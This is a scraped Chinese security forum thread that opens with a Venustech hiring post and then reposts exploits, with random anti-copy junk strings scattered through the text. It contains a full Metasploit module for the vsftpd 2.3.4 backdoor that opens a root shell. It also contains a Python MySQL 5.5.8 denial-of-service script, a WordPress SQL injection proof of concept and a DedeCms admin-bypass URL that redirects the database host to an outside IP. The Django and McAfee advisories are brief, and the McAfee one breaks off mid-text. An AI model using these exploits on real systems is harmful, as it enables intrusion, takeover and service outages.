最近看过此主题的会员

返回列表 发帖

[人才招聘] [招聘] 启明星辰研发招聘

  • 招聘职位: 其他职位
  • 公司名称: 启明星辰
  • 工作地点: 北京
  • 专业要求: 其他 
  • 学历要求: 本科
  • 工作经验: 2年以上
  • 职位薪金: 面议
  • 年龄要求: 不限
  • 性别要求: 不限 
  • 公司网址: http://www.venustech.com.cn
  • 简历邮箱: xiaoyan@sitedirsec.com
  • 联系电话: 00000000000
  • 在线QQ:
  • 安全助手: 通过非安全中国管理人员招聘/求职,QQ群:57116771


  • ++++++++++启明星辰相关说明++++++++++

    站内发信给我就行了。6 n2 M+ w" j' W0 s

    & ?4 V+ f; K2 n# b3 b' {

    一、研发中心:Linux C软件工程师(若干)

    岗位职责:

    1.
    : M7 \& C6 c& D8 x2 [0 e安全网关,防火墙,IPS等嵌入式设备软件开发,维护

    岗位要求:

    1.
    $ k! r; [" F: Z% u  P精通C语言编程

    2.6 J4 M: N, u. b! C9 d6 _/ `
    熟练使用Linux操作系统,精通 Linux下C语言编程

    3./ l! W0 w! e1 m6 Q7 M( G
    精通TCP /IP 等网络协议,熟悉应用层协议,及协议分析

    4.$ k& c6 D& t' ]6 V5 A6 o4 T+ A! |
    熟悉网络安全协议及路由器、交换机、防火墙等安全设备

    5.9 S8 r$ I& t7 v( J
    熟悉Linux内核及开发

    二、研发中心:测试工程师(若干)

    岗位职责:

    1.2 c+ C, b4 x  ]# ?( @9 x
    负责产品的系统测试、集成测试工作

    2.
    0 m, ]9 v' W1 `负责产品用例的编写,执行、修改

    3.
    5 C6 x8 J2 X1 c% v, H1 Q负责产品性能的测试

    4.
    # g4 O. S5 N! `( R6 H负责对外项目的支持和测试工作

    岗位要求:

    1.) t- R& n8 Z$ O+ ]) F) z
    掌握基本的tcp/ip知识

    2.0 M/ y# }% H. `. T1 a( Q- |
    数通基础好

    3.
    " P5 J# K" E& H4 B7 g对linux有一定的基础

    4.4 s# T, {* Q) P4 H% |3 X
    掌握数据库的搭建和使用

    5.
    6 o6 ^- _! s: J5 H+ ~至少熟悉一种编程语言C/Perl/VBS/TCL

    6./ t. ?; j, S; ]* C9 O
    熟悉测试用例设计,熟悉系统测试,熟悉压力测试

    7.* a% g7 K, K) k. |9 ]) I2 W
    熟悉防火墙相关原理,对于防火墙的一些功能特性有一定的了解

    8.
    : Z: F) c  P) a/ H0 }% t对网络安全设备在网络中的部署有一定的认识

    9.6 T4 t, \8 b% A/ Y. L. j- ?' A5 Z9 K
    掌握测试工具的使用:Loadrunner、包分析软件、思博伦或IXIA的测试仪

    三、研发中心:安全事件工程师(若干)

    岗位职责:              

    1.
    / k0 Y/ t' v0 v& R0 q0 e$ M
    木&马检测服务、WEB漏洞扫描服务的实施

    2.
    8 w3 o$ c) Z6 g( }, g& P' d& b
    对服务客户的技术支持

    3.
    5 z6 @( y+ s4 O& g' ^
    对于网页木&马,WEB漏洞、蠕虫、扫描、拒绝服务、缓冲溢出等的研究

    4.
    1 K+ i# T4 A6 `2 M8 `8 X
    对IDS/IPS/UTM/TDS/WAG/322等产品的安全事件库进行日常升级和维护

    5.
    2 q7 W% ?6 B0 q8 @9 H/ H1 H' T
    对各种攻击手段的研究;TCP/IP协议的研究;逆向工程的研究

     

    您可能还想看的主题:

    启明星辰招聘

    非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
    2、本话题由:小妍发表,本帖发表者小妍符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
    3、其他单位或个人使用、转载或引用本帖时必须征得发表者小妍和本站的同意;
    4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
    5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
    6、本站管理员和版主有权不事先通知发帖者而删除本文。
    收藏 分享

    VSFTPD v2.3.4 Backdoor 命令执行漏洞
    ################################################# $Id: vsftpd_234_backdoor.rb 13099 2011-07-05 05:20:47Z hdm $    ## This file is part of the Metasploit Framework and may be subject to      ## redistribution and commercial restrictions. Please see the Metasploit     ## Framework web site for more information on licensing and terms of use.# http://metasploit.com/framework/                                                    #################################################! F( k6 N9 G6 S; i6 c# U
    7 e, }2 Q; B) [/ i/ f. v
    0 P6 i+ R% }/ [, z" X4 x

    ) O  |5 Z! w& p6 rrequire msf/core
    ) b3 P, e! S, u: ~5 h! u3 U- `2 W$ K
    class Metasploit3 < Msf::Exploit::Remote
    ; o% b/ A: N5 [1 ?( NRank = ExcellentRanking0 x0 Q- Q5 R! T6 W; }
    % A& F+ X% W( w/ D
    include Msf::Exploit::Remote::Tcp
    % n* L0 R6 @  s5 `% Y" P: b* j( t: j( ~
    def initialize(info = {})- W- y* `; L0 Q% E
    super(update_info(info
    6 i. N4 A. ?  L  b: d$ QName => VSFTPD v2.3.4 Backdoor Command Execution
    # }4 S0 e) i; n/ zDescript_ion => %q{% g, o+ h  c, L8 \2 S
    This module exploits a malicious backdoor that was added to the VSFTPD download
    0 B% e/ V4 q  G! k, x# I$ a; aarchive. This backdoor was introdcued into the vsftpd-2.3.4.tar.gz archive between6 v; G7 E. n) J( p& y7 v& O
    June 30th 2011 and July 1st 2011 according to the most recent information& R' u3 P  `  c
    available. This backdoor was removed on July 3rd 2011., Z' h7 t7 ], b0 \) |* d
    }% G9 w4 U; j" K: Z5 T0 F& E
    Author => [ hdm mc ]
    , \1 z' Q6 I8 {3 K1 ]* j/ T: A$ KLicense => MSF_LICENSE
    0 Q' U1 j6 j3 a' X# [6 x4 PVersion => $Revision: 13099 $! S& X* r& K( @2 B# v$ Y/ B
    References =>( u: y& d  t" z: @- j, C; @9 t2 J
    [& P7 `# a1 t% w* B$ W) P8 x
    [ URL http://pastebin.com/AetT9sS5]
    , g% C. d: w, c  k. c[ URL http://scarybeastsecurity.blogspot.com/2011/07/_(使用时去掉_)alert-vsftpd-download-backdoored.html ]
    2 {, `" I0 c0 j3 D# h+ w& [) E# c( }]# W" f9 ~  A0 n8 D) Z: j( h9 a
    Privileged => true
    ! t) ~0 ?6 F+ w0 k; l( x2 t0 p# R& H1 uPlatform => [ unix ]4 t' L5 S, X' i( A
    Arch => ARCH_CMD
    : |" f% i/ ^# g/ J. qPayload =>2 K5 H8 A# N; ?* ]* }
    {
    8 Y6 b* ~$ ?, U/ K) \1 ~0 B7 ~Space => 2000$ F! U; F8 R/ t4 Q
    BadChars =>
    ( l  ~; M: p0 x1 QDisableNops => true
    0 j. [( h9 C9 Q, ~Compat =>
    ! G3 u8 ^: D1 u/ C; i{9 B& j3 |( u  t. D6 n2 G& b
    PayloadType => cmd_interact
    ; ]9 l- D' b2 u! W8 w. XConnectionType => find
    + E" q, }3 w0 I0 c}
      S. P0 u% a$ i3 h* [# W8 M( l- z}
    # C- R. w1 i* q$ iTargets =>
    $ k0 E: e: t9 O! g[
    4 n( z; h1 ^/ ~1 g: ][ Automatic { } ]
    6 K1 p+ B$ g$ I" T9 Z9 s& H]
    ) q7 r& l) w- B& _- d  cDisclosureDate => Jul 3 2011) B+ {# w1 ?4 V. c4 p% O! k
    DefaultTarget => 0))& v1 O; d9 |; ]- n2 D& Y1 d- e$ H
    - w% p, r: k) j8 A6 t& w# P
    register_options([ Opt::RPORT(21) ] self.class)7 K3 t: g, l8 e9 ]1 F- J
    end
    + b2 v. A7 h- G3 O9 E2 ?
    0 d+ C; e3 u: F1 y# s6 ^- l# w4 ~( z" hdef exploit
    1 l; K( O* d" T; t0 O( y  O! l. d4 x8 W! J4 `/ z- J6 H
    nsock = self.connect(false {RPORT => 6200}) rescue nil$ f! n* N% O; ?( E1 g( F
    if nsock
    , m6 H! `/ H3 wprint_status(The port used by the backdoor bind listener is already open)% [6 M! B. s3 u; Q# y
    handle_backdoor(nsock)
    & W4 r3 m% W. E$ I6 o; Rreturn
    7 h2 H8 _* d3 Vend
    ! U- t$ v# C0 |" b3 g
    & P4 {# o4 z, `# V! n# Connect to the FTP service port first* D* Q. u8 @8 G
    connect
    ( Y6 b) A2 ]' |. \% Y( s, c+ \8 G# ^' S. M+ X
    banner = sock.get_once(-1 30).to_s/ y3 p% i& g# _+ O( W
    print_status(Banner: #{banner.strip})$ O$ f7 ~1 S& @8 J$ S7 M0 j& I
    - ]5 H0 B# P3 r4 p, r1 e
    sock.put(USER #{rand_text_alphanumeric(rand(6)+1)}:)7 L2 m9 q9 x' c' F) ]
    )
    ) _$ v$ D! B: l* d. O3 n8 x# K4 q* x+ y( `resp = sock.get_once(-1 30).to_s- y: B/ F2 g6 G" ]3 U
    print_status(USER: #{resp.strip})
    1 C# o' ?- G4 ]0 ]& {( L! m
    # D; A: |' v* }4 o- L3 s' l, oif resp =~ /^530 /4 Y, c- O7 C7 _9 j; e8 a& k
    print_error(This server is configured for anonymous only and the backdoor code cannot be reached)
    % J) q( [# \! A+ y$ Odisconnect
    / T3 ?: g; w* ~' Vreturn
    ; h3 i% @, L) ^2 L, K/ o6 z& Bend
    2 W2 |( h9 P# f$ y8 G3 i& @3 D4 Z
    ) ]+ h9 x2 d( T5 b1 wif resp !~ /^331 /
    4 @3 ]7 O6 o7 r8 L% i) \% lprint_error(This server did not respond as expected: #{resp.strip})
    * G: f" o! ]% t8 E, K! E* Pdisconnect8 f( d2 c. H6 b8 A
    return
    ' p6 g# I' Y3 ~/ i! _) u: eend) z  q3 k2 Z$ g
    ' o, q, M2 X; T( Z! V6 N
    sock.put(PASS #{rand_text_alphanumeric(rand(6)+1)}. A& o7 N/ t8 u6 ?! ^
    )
    0 {) K5 h& F8 _) B$ V; @9 F- B% G0 D% {3 p0 j
    # Do not bother reading the response from password just try the backdoor
    7 V9 y6 f5 ]( ]" e; I6 L+ }nsock = self.connect(false {RPORT => 6200}) rescue nil# V9 r$ {, R/ {$ d) O* q3 [; c
    if nsock1 J0 \% C" Q1 B; L: E' R  q
    print_good(Backdoor service has been spawned handling...)# C9 h; y; j3 Y9 M+ L3 i
    handle_backdoor(nsock); Z1 F& [& h" T4 C
    return, a# m+ k( `( c0 Y2 P
    end( m( f( V  @" }% H+ t: \

    : B% S( _& t% u2 ~+ B! qdisconnect
    5 g  B* S& A$ m2 K: v: I7 U' l% m$ W8 c* _! Z1 O. J' N9 S- v6 Q: g
    end# T. P4 j/ y+ H  G+ v# S5 A

    8 w/ f1 f* X9 F! k- g. X3 }def handle_backdoor(s): v- i/ y7 |& |0 T0 n9 e

    1 G4 Y7 r9 ~4 Us.put(id+ j5 b5 P2 x6 Z5 q- j; @' ^
    )
    3 j! u3 y8 p5 ^* a0 Z% @/ w' I3 ^# X. s( s, H& f
    r = s.get_once(-1 5).to_s
    ( D5 Q  p/ X, S* r1 _4 v1 kif r !~ /uid=/' O- o/ ^; e2 h9 U6 o  R
    print_error(The service on port 6200 does not appear to be a shell)
    , I: I" O, o& w6 }3 w3 n9 T8 |disconnect(s)4 u, P# s' G+ Y- z* e: @
    return+ \4 X8 F1 W  l7 ^* w
    end8 w2 [+ h/ R* Q; Y
    . P/ A( k7 B3 }1 M  ~
    print_good(UID: #{r.strip})9 m) L# D' L$ q. }
    2 ~" |5 l( x  q" Y" p
    s.put(nohup  + payload.encoded +  >/dev/null 2>&amp;1)( ^9 k2 m; o$ \+ u2 x: W
    handler(s)
    ! G8 n$ t- ]9 e$ Y. q: Rend
      ^7 {" F$ K2 F) q) L4 R
    * M! M) ?) d7 h8 ^1 g9 M2 Hend复制代码
    ! f: {8 W, u+ t0 C, f* y# v  {; Q) E2 u( M. G" A- g' l
      }4 ~, |6 V- \' ]
    3 j" A# e/ }6 L0 T

    ! U0 ]7 Q* w; t& [$ y
    & @! [$ X) i& ^! ~: Z5 @; O
    9 l$ R8 A8 ^0 X3 K: R
    / [( n) g3 V" _; M+ ~7 {6 w( a
    ! R$ ^- u/ T, g8 C0 p. W7 F# W+ d$ s* E  l( [

    * s' c6 |4 H2 X
    ) a+ D4 j; ~# T2 N) R. P; x* W4 Z! F8 M. n9 l
    % D; a% ]! p; O% w* N; L3 I6 S
    + ~. Q: ?5 R: P6 r' F
    9 u+ d) [6 ]' T5 p! L1 k
    ; {+ s* }+ l7 p( y! G
    8 {7 T; j. E. A0 z; D6 j

    8 V3 i4 T+ |% p4 G公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    WordPress Event List Plugin <= 0.7.8 - SQL 注入漏洞
    1. Description:! f6 \: P" h6 `. W& F
      
    ( w. ^' ~5 z, E9 ~8 i     
    ; N& ?5 H3 v& z0 ^7 W5 @  
    . H" m& p  z. \/ H# x6 C  jSQL injection vulnerability in the Event List plugin 0.7.8 for WordPress
    / O# Z, l# _; N; gallows an authenticated user to execute arbitrary SQL commands via the id
    ; H6 z8 A0 P. @. x  Q9 \) Sparameter to wp-admin/admin.php.
    $ |7 _3 _) j4 ]4 y/ ^% [5 P  
    3 i2 h# M; [" Z* G. E3 c: O( T+ D+ e  m   
    , C9 ?- a9 i9 @7 N  # W( @7 t3 w( w6 x  s# B
    2. Proof of Concept:
    ) `, n" k  m- U: X) |2 g  ; V7 @, t+ n4 Y, l" M
       * T1 O1 n7 R" K3 T3 g- \6 r9 o
      6 M% ^5 j  q) Q# _! Q6 D1 P) u( V
    http://[wordpress_site]/wp-admin/admin.php?page=el_admin_main&amp;action=edit&amp;id* B. ~( D- w3 e2 L6 Y
    =1 AND SLEEP(10): V' o& a  Z1 M: _% ^4 S7 A2 ~

    , f( M) z2 f" E% h0 o* \  
    ; A2 _$ z: J1 o+ q7 @% Z7 U0 {   
    $ Y( a+ t$ N& }$ x' F$ f  
    5 w9 l2 q* y4 Q: C. x) f& k4 p3. Solution:! {# Q, Q% y* ?# J& D: t
      . p0 ^' C5 G  X
         
    - }' `* l* I( f: R8 S2 A  7 u; t' e/ H4 a9 J0 ?, C) V( z
    The plugin has been removed from WordPress. Deactivate the plug-in and wait4 N) j" S& P& P7 C6 X
    for a hotfix.# m' W, Z% B8 c9 n
      : `! a( Y+ k. W: s  x8 A% f
       
    " q* U$ ]. X! ]3 z8 T% V8 _2 r  
    5 y1 H; ~" C( M' Z3 u+ d8 [4. Reference:# E5 E) b# z) R! y! }( o4 F- \
      
    : i3 D# h- Q2 F   ! e5 K+ [: P/ t! W9 R" k
      5 \; j- J, @3 D; v- w
    http://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-inje
    - O" ?$ d9 ^+ L4 h: D. ~' `" {7 Qction-sqli/
    8 g; \) F9 F4 z7 Z: a$ ~6 o  n4 n  
    $ E0 C* C# }' Y- F% j) J- m# Nhttp://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9429
    % b/ b+ Y. x" U: r, ]/ \, Y1 b6 L8 P
    % E' c+ w9 g/ W+ \: f

    0 v) f' X* [' r* a* e
    ; V% @, H% }4 Q) l; S( ^6 E4 ^% P
    8 n6 m4 C$ A2 E+ t0 o
    . o( `4 s, C2 q/ H0 _
    * Y/ B% D9 k# s1 }5 Z
    & @* [7 B0 m8 V0 \7 L8 t' V2 g
    ( w, a. v5 c: O( Z' J% `( J$ o/ U5 b( V8 w- _8 \) U
      a- N( t! K8 ^+ F# h! a, o

    4 j  Y/ y) p; I7 ?6 u1 V( l: X" Q- v7 ~2 O3 b% H
    2 r) F9 [) i" F# |- l
    . u  f# z& U9 \8 y* H

    2 c5 x, V6 M7 g: }8 L5 E) r( {

    8 ^0 [2 ?3 e( \+ ~公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    MySQL 5.5.8 远程拒绝服务漏洞
    import socket, sys
    . T% a" m) d6 R) x % E5 D1 B1 O8 d& L- c
    print "; `/ P5 A. }" M0 F& H$ L
    "3 S5 _$ E/ a$ j" x- k! D) M
    print "----------------------------------------------------------------"8 g1 E( f- l" c3 t6 x8 Y
    print "| MySQL 5.5.8 Null Ptr (windows)                                |"
    1 q) N6 z: v3 ?2 V, l  V' hprint "| Level Smash the Stack                                         |"
    ; \% _4 R- W/ Y  Dprint "----------------------------------------------------------------"
    * T/ M! E  R6 sprint "
    ' u$ A9 A- g6 Y6 T3 ^"/ v1 t# U4 u  [

    % o9 c! m, _! L1 T* I( b. t  obuf=("&amp;x00x00x01x85xa2x03x00x00x00x00@x93x00x00x00x00x00x00x00x00"
    . ^2 S! J6 Z' t1 H- O" y"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00rootx00x00")" s  j' @& y* L' M5 d( w+ [5 Z& l

    ; x  D( Q5 k9 _/ [buf2=("x11x00x00x00x03set autocommit30")
    ; @5 e- e# \- i8 f1 Q: @. r0 m 7 S1 ~+ o, b4 ^1 [
    def usage():- {  a- R! J# z$ O7 I5 ]
    print "usage : ./mysql.py <victim_ip>"$ o+ \3 W9 M0 ?, O5 I( \
    print "example: ./mysql.py 192.168.1.22"& _  T$ O: _& y5 j' k

    6 o& o! U8 D! g& e5 T" `
    & q) S- L7 i4 E5 [def main():
    7 L4 p$ L. H3 n) G- xif len(sys.argv) != 2:0 s. m0 p# }: S6 Z
    usage()0 I  g/ N* b% u0 @3 Z2 G. m
    sys.exit()
    . b6 _9 A7 I8 K9 rs = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    ( p2 ^+ i5 m7 X7 _ + l0 Q: `) g4 K* T
    HOST = sys.argv[1]* t, O4 T# V: Q  j( q: P
    PORT = int(3306)0 R, J  Y# X& f+ O; F& J: K
    s.connect((HOST,PORT))# G  X7 Q0 m$ I) g  x9 S
    print "
  • Connect"
      ?1 g$ m( h( D/ w* Z' cs.send(buf)
    " Y) C9 i5 E. p; l1 u& xprint "
  • Payload 1 sent"7 ]% e9 G3 O" v% @% n) }
    s.send(buf2)5 O( ?: `# K  r: H8 \
    print "
  • Payload 2 sent
    . }. L' a0 s, W- u  i. _", "
  • Run again to ensure it is down..
    * c$ R& _6 C* g8 B% \"
    ( M2 L* k2 ^& E! s4 f+ hs.close()  l0 X' j  x7 H1 d9 U
    0 \6 Z5 _# R4 C
    if __name__ == "__main__":# e+ X  A0 w+ w# Y* T% }
    main()
    $ e: J$ j( e% y: T& e! r, C* v; y( M

    $ ?; r5 l3 q0 Z+ x0 H% q
    ( I7 `8 p0 U. X! I7 D$ b# ?( F# D2 Q
    + p6 P" b5 R/ M  N* Z
    / O" Z2 ?2 J, b* B" U* w; d* N5 V' [9 U6 B% I  b1 E
    . |6 n8 f8 m" P3 i( q) U

    $ ?( d" G0 p* U' C
    ! B0 R2 o, J- \) F, k! Y+ u
    4 F2 q: _0 ]0 l5 `! T: u
    0 k  q! G; R0 L5 ~( B8 c! w6 @$ p' V! h  Y' Y

    " S) F$ p& _! \! q" m
    ! K8 s( M& i) P; H6 H5 `3 N8 A3 Q' N

    ' y9 f6 [. t! Y- }: [% n& r, j) S/ d. B0 t9 Z; |& L) o8 {- j0 V: g

    ' i6 D1 r9 g7 H  n# E5 P公告:https://www.sitedirsec.com公布最新漏洞,请关注
  • TOP

    手把手教你装Linux系统-设置虚拟机

    : J  X4 l* w$ K& G. M7 U+ Phttp://www.sitedir.com.cn/video/4.swf
      G! M$ ~9 O+ I0 Y6 E( v; c8 a. O8 @4 t. m% [7 c

    3 ~, M, P# B0 u, C# W# m" Q# L# \+ d+ J0 o0 |5 v4 B
    ) W) S6 D9 j6 t; n
    ' u! z& s3 c4 I  b3 \
    * D8 H. H6 i6 b
    " b& `2 m$ |: A8 v

    2 k- I( [( a1 x. Z0 m: N: g; C" ]2 Q; p+ y# J

    % x& T6 `  X! D9 y* f5 M) z
    & F5 x7 a  u. @$ I* r
    # u3 b+ f1 a) g5 f- j/ D3 _! T8 L) `. s! Q
    9 x5 `" n! h; y

    & T1 b; X9 ?7 Q1 _4 @9 j
    , W! z; h: o4 t8 R& i
    # k* X' n2 d7 s; A
    , r. J& i6 {6 ~公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    织梦(DedeCms) v5.6-5.7 越权访问漏洞
    http://www.XXXX.com/织梦网站后台/login.php?dopost=login&amp;validate=dcug&amp;userid=admin&amp;pwd=inimda&amp;_POST[GLOBALS][cfg_dbhost]=116.255.183.90&amp;_POST[GLOBALS][cfg_dbuser]=root&amp;_POST[GLOBALS][cfg_dbpwd]=r0t0&amp;_POST[GLOBALS][cfg_dbname]=root
    + Q9 Y. i/ Q7 k( w5 B6 z; f0 D
    把上面validate=dcug改为当前的验证码,即可直接进入网站后台
    0 ~6 }& S& E3 }0 P( U
    此漏洞的前提是必须得到后台路径才能实现

    ) H4 w9 @. z, [
    官方临时解决办法:

    + t+ ?0 k+ l, b, d; `
    找到include/common.inc.php文件,把:

    7 _% D2 [6 n/ a. O1 M! J
        foreach($_REQUEST as $_k=>$_v). M8 x1 T4 n6 n9 \4 I, W& E
        {, v2 ~0 o; G7 ~) Y+ r3 P' H
            var_dump($_k);
    ! T3 [8 Z1 B$ E" h& G& h        if( strlen($_k)>0 &amp;&amp; preg_match('#^(cfg_|GLOBALS)#',$_k) )
    - x! {! Q% v' {" `+ P' M- J        {
    $ g1 c; r0 l1 D$ A. G            exit('Request var not allow!');
    * a6 J% k8 R3 E6 V3 z        }
    1 s5 a8 Q. Y& l0 \2 p  i0 L3 C    }
    " G8 f  v. A3 e4 ~/ e  ]( u& r
    换成:

    * N% j! B* u7 ]' g) b6 t
        //检查和注册外部提交的变量
    0 ~: M) U1 e( r. V6 B5 E* J9 D    function CheckRequest(&amp;$val) {
    , P  N- P5 t' j1 H2 [        if (is_array($val)) {; J) r# E" ?, B2 \
                foreach ($val as $_k=>$_v) {
    ( O% d/ P! X4 ^7 J                CheckRequest($_k);
    5 a, ]! z( u! ]2 s( f, C                CheckRequest($val[$_k]);
    4 G$ D6 w% o4 |- T' l            }
    + u" ~4 Y* @0 Y1 i        } else
    & n$ ?* F. c1 e4 J9 H* u6 f! v. W        {% j" `  q0 e3 ^" L$ F1 ?
                if( strlen($val)>0 &amp;&amp; preg_match('#^(cfg_|GLOBALS)#',$val) )
    / E# N! u$ `* Q2 m' K            {7 l5 V7 ?) n  N  ?7 b# d/ ]; r
                    exit('Request var not allow!');" L, Y* X! F' z0 d7 J: ?
                }2 b" t/ m* r$ A$ k6 f5 h
            }0 j/ f/ E9 V6 _4 D( S& Y7 S9 s. n: l
        }
    * o+ Q, r3 w2 T. n. R" N4 K    CheckRequest($_REQUEST);
    2 q, a0 w' G5 `. Z! L, X* Y4 x
    & S% k  K# X: H2 q( l0 |
    ( p: B$ }' @3 S, L- C
    7 Y; T6 S- T- i& ?% ]
    & e% u3 f1 w+ ]0 g+ p4 y7 `3 G. v

    1 ^2 c9 \8 ^% P  w, T2 h( Y5 ~+ j) @9 B  Q! Q9 `
    8 j; W* m, C2 Q$ v5 V7 f  V& G1 v
    6 J+ x& k8 E. W* M9 N# Z; C
    # N9 d1 i- v3 Y
    1 G" V  w9 N8 r. ]0 B6 {3 Z7 Y- b

    0 W! \. `. {7 p7 V! e# ^6 m& m# M- n' c
    , r0 l! @3 `9 }1 j6 w. [) T

    ! S. D: R/ r0 c1 {. C8 d) I9 N( Z9 `4 ?/ z4 N3 y% c5 m
    % v! J, h9 a" P0 I& J

    ! k: D. y% _$ A! n; C- D8 A9 T7 c5 t3 w* j. X

    3 g" }6 G# H! ~0 W3 Q公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    手把手教你装Linux系统-设置虚拟机工具
    <P align=center>
    1 M" a% h. e0 H+ p& y# |! n; B
    8 q- W# z- `, E3 M* @http://www.sitedir.com.cn/video/8.swf[/quote]. K" U7 l0 B6 E+ E6 }% R, S( o

    ; G9 O: Z; {* ?/ T9 }& t4 o' i& Q9 [5 r% S/ n( @' q+ U* \

    0 k  ~" b% s; H& E. Q& z# O! i, {
    / V6 l7 L  U& b9 x. H

    ' ^: l8 L$ w& [% z$ p# }/ a  X3 I$ q* ?% G& h3 c4 Y' a. p6 s
    6 d  Y" q) p* W( [+ S) {, \
    ' E3 [+ u9 {. c2 i

    5 \1 d7 t" x5 ?% p: Y6 @" @2 J$ x6 C) {4 p
    * U3 z7 Z0 @2 B; |
    ' p5 z6 y) V! P- P) w8 Y
    0 r9 A( ?6 V4 B, L6 U
    ! }. R9 S' @! l- u- M0 a. A+ V* S

    + ^: V7 a+ d; h2 H0 A
    ( b! X6 k! P+ A0 f0 V" J( w* {. e* O3 ?$ w2 E
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    Django开发框架多个安全漏洞
    发布时间: 2011-09-12

    ) P5 Y. `, x' @& e2 q3 L* u. A
    影响版本:
    6 j: D5 J% u$ e" q2 h+ KDjango 1.2.5- t' H6 K+ a% ]- J$ Z& a7 I
    Django 1.3 beta 1
    9 C' I& S+ Z9 jDjango 1.2.4' K4 V5 v$ e% M9 V4 @8 }) F9 X
    Django 1.2.2
    5 }& b; a. A) y4 ^Django 1.2

    4 I5 D9 h8 c5 y0 E; a; Z& a
    漏洞描述:

    ( E, k- n; H! q
    Django是一款开放源代码的Web应用框架,由Python写成。/ q: A' G$ R6 t' h/ j, D1 r. y
    Django存在多个安全漏洞,允许攻击者获得敏感信息,操作数据,进行缓存毒药攻击或进行拒绝服务攻击。
    $ K' s: `* Q% E; q5 K8 G( {+ H1)当使用缓存后端时django.contrib.sessions中处理会话存在错误,可被利用操作会话信息。要成功个利用漏洞需要已知会话KEY和应用程序允许攻击者使用合法会话KEY储存字典类对象到缓冲中。
    7 U5 r! u0 u2 i2)Django模型系统包括一个字段类型-- URLField --,用于校验提供的值是否为合法URL,如果布尔关键字参数verify_exists为真,会尝试校验提供的URL并解析。默认情况下,底层套接字没有超时设置,攻击者可以利用此漏洞发送特制URL消耗所有服务器内存,造成拒绝服务攻击。- n" N7 k% K( w# O  u$ Q
    3)当校验提供给"URLField"字段类型的URLs处理重定向应答存在错误,攻击者可以利用此漏洞把重定向应答返回给"file://" URL,可判断服务器上的本地文件是否存在。
    . k% x5 C( r4 v' v$ Y5 H4)当生成重定向应答的全路径URL时处理"X-Forwarded-Host" HTTP头存在错误,攻击者可以利用此漏洞进行缓存毒药攻击。
    * |4 Z4 U5 c) l
    细节参考:
    + u9 ~6 O/ l  K+ Rhttps://www.djangoproject.com/weblog/2011/sep/09/security-releases-issued/6 u( A; u0 B3 y" }
    http://secunia.com/advisories/45939/
    0 M& E! g8 F4 K$ U. a
    4 N# F! }( Q' [( Y
    " y, P% }( q3 t: h) K3 S- s

    % K5 @/ ?3 T; g- E- A& D$ G0 t# g- n# ]! ^, |

    " J  Y" T  r# H5 H; C; ]' y$ u$ y$ i( D
    9 e2 |) T$ Z5 [9 a! s& n7 H6 `' R

    $ ~$ ]4 H+ \8 r! n3 G
    & Q7 J( r8 V- m, ^8 b" z) Z2 H: m# ~- n- ~+ T% F0 |  W4 Q

    ; m& a) l/ Z& E5 q5 E
    3 a4 u; `( D1 M0 `) D8 z2 I# Q
    & t) z' c0 F8 }: p+ O
    8 [2 m1 s) n5 S. m$ G  m% ]
    , G6 q; Y" z/ y9 u/ v# d) |' B/ n& I; R( [& o/ c9 R# p5 P0 Z3 O) ?
    " n' R  E% C- A: [% f, s, c

    * e: h3 A8 m+ y4 u7 T
    & P/ t  d. |' \/ \4 s$ h公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    McAfee LinuxShield 本地/远程代码执行漏洞
    McAfee LinuxShield remote/local code+ Q1 p7 _7 A# N2 X) `1 N
    影响版本: McAfee LinuxShield <= 1.5.15 @0 `" ?5 `0 i
    远程攻击: Yes
      c8 q' b' W: R$ d- _: [" q本地溢出: Yes
    ) O7 x5 p( j* N0 S( O5 {# P背景阅读:
    / v- J" X9 l7 c, }, T===========
    7 d- g* S0 h5 q
    / a& _8 k  b2 u# c5 q. iLinuxShield detects and removes viruses and other potentially unwanted
    3 Z0 X1 @$ t) d/ Ssoftware on Linux-based systems. LinuxShield uses the powerful McAfee
    0 `" x8 {! r! J7 M! f3 ~& [scanning engine ?&amp;#65533;&amp;#65533; the engine common to all our+ N6 a# B5 n3 s  W  D
    anti-virus products.
    , r8 b9 ]% Q5 m. s9 J9 H) Z& l+ Y, s2 {- ^7 o! m
    Although a few years ago, the Linux operating system was considered a# R% I( \2 Q$ `! s! ^5 B
    secure environment, it is now seeing more occurrences of software
    ' Z  J" ?3 x* Q6 d( |2 _specifically written to attack or exploit security weaknesses in
    * w7 s4 T* W* }+ F" h+ kLinux-based systems. Increasingly, Linux-based systems interact with3 ]9 H# U$ {1 q
    Windows-based computers. Although viruses written to attack Windows-
    & ]2 [' v- `( @  k2 Sbased systems do not directly attack Linux systems, a Linux server
    5 l+ d$ ^9 `: Z* {$ @can harbor these viruses, ready to infect any client that connects to
    . P1 u- M6 D' a# t" ?5 c( Git.7 M/ e; Z9 z9 F1 F, N) k
    . k4 s1 ]  U: f7 Q" _: Z
    When installed on your Linux systems, LinuxShield provides protection% Q) o2 B  h. {# e1 |3 v
    against viruses, Trojan horses, and other types of potentially
    . Y( a5 B, c9 h' W( Cunwanted software.( D( m) W* K1 q2 E8 V
    . f, P- c5 D& J: U# {
    LinuxShield scans files as they are opened and closed. a+ h$ x3 m0 _9 J& @# M
    ?&amp;#65533;&amp;#65533; a technique4 x1 X! {- }& i8 M6 d$ f: g
    known as on-access scanning. LinuxShield also incorporates an
    ; K1 D5 y2 M- p7 ton-demand scanner that enables you to scan any directory or file in
    # p" l* |4 k. k" L' u1 Myour host at any time.
    $ U) K+ e: D) h- V! g+ ^6 D- u1 `  ]( \0 O( x5 k3 g- D' p
    When kept up-to-date with the latest virus-definition (DAT) files,
    7 }; i6 g6 P! v/ p! ?LinuxShield is an important part of your network security. We, p  i; {7 [2 `  Q) M: _
    recommend that you set up an anti-virus security policy for your
